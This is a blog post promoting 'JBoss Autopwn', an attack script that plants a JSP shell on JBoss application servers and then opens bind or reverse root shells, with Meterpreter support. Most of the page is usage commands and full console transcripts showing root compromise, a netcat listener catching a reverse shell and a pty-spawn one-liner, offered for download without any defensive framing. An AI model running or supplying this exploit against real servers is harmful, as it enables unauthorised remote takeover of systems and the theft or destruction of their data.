Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

JBoss Autopwn - Hacking JBoss AS Server

This JBoss script deploys a JSP shell on the target JBoss AS server. Once
deployed, the script uses its upload and command execution capability to
provide an interactive session.

Features include:

  • Multiplatform support - tested on Windows, Linux and Mac targets
  • Support for bind and reverse bind shells
  • Meterpreter shells and VNC support for Windows targets

Installation
Dependencies include:
  • Netcat
  • Curl
  • Metasploit v3, installed in the current path as "framework3"

Usage
Use e.sh for *nix targets that use bind_tcp and reverse_tcp
./e.sh target_ip tcp_port

Use e2.sh for Windows targets that can execute Metasploit Windows payloads
/e2.sh target_ip tcp_port


Examples

Linux bind shell:
[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? bind
[!] On which port would you like the bindshell to listen on? 31337
[x] Uploading bind shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
[x] You should have a bind shell on 192.168.1.2:31337..
[x] Dropping you into a shell...
Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@nitrogen /]# full interactive shell :-)


Linux reverse shell:
[root@nitrogen jboss]# nc -lv 31337 &
[1] 15536
[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? reverse
[!] On which port would you like to accept the reverse shell on? 31337
[x] Uploading reverse shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload
Connection from 192.168.1.2 port 31337 [tcp/*] accepted
[x] You should have a reverse shell on localhost:31337..
[root@nitrogen jboss]# jobs
[1]+ Running nc -lv 31337 &
[root@nitrogen jboss]# fg 1
nc -lv 31337
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")';
[root@nitrogen /]# full interactive tty :-)
full interactive tty :-)

You can download JBoss Autopwn here:

0 comments:

 
Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!